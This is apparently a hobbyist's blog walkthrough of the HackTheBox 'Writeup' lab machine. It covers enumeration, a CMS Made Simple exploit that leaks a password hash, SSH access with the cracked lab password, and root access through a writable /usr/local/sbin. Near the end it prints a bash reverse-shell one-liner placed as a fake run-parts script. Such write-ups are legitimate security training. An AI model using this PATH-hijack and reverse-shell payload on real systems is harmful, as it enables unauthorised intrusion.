i find myself breaking things far too often. maybe i’ve broken a lot more than i wanted to.

i’m a software engineer gone cyber security geek. i love to pentest, code, and break things… not in that order. i also game from time to time. stick around, you may like my content.

tech – tips – reviews – gaming

a developer gone cyber security geek

The Geek Bin

HTB: Writeup Write-up

I’m an avid doer of hackthebox machines, and writeup seems like a great fit to be… written up!

First, let’s start off by doing a basic nmap scan of this machine to see what we can find!

After some enumeration, I found there’s a directory called /writeup, on there is three pages, and a clever hint about not being crafted with vim. It looks like it’s CMS Made Simple, and we do have a vulnerability! I wget this file to my kali box, run it with the target url of http://10.10.10.138/writeup/, and it spits out some lovely output to let me know the hashed password and salt:

It didn’t take long to crack this one, using a free online cracker and entering the hash will give you the password. Now, this is tricky, it’s not the web password — it’s the ssh user password! Let’s give it a shot.

ssh [email protected] # password raykayjay9

Here we have our user.txt file to own the user, bingo!

A basic check of writeable directories using find / -type d -writable 2>/dev/null reveals that /usr/local/sbin is writable for us, this is good news — but what is going to trigger it and is there a suid? At this point, I usually crack out some enumerators, but after searching the forum it appears there’s a better tool for the job, pspy64! On your kali box, download pspy64 and scp it to the remote machine.

Now you’ve wget and scp it over, make it executable and run it! Now, I noticed my path doesn’t have /usr/local/sbin/, which isn’t great… maybe the root does? Nope. It appears to be executing commands in /bin/…. yikes.

At this point I opened another terminal to see if I could do my enumerations, and spotted a goodie inside of the pspy64 output….

We’re actually executing run-parts on user login, and we set our path here as /usr/local/sbin… awesome! Let’s create a new run-parts… shall we? 🙂

#!/bin/bash
bash -i >& /dev/tcp/IP_ADDRESS/PORT 0>&1

Now, make this executable and copy it to /usr/local/sbin/, and ssh into the user once more (once your local kali shell is up, of course!), and we have root terminal!

We’ve now rooted this machine! On to the next, shall we? 🙂

Add Comment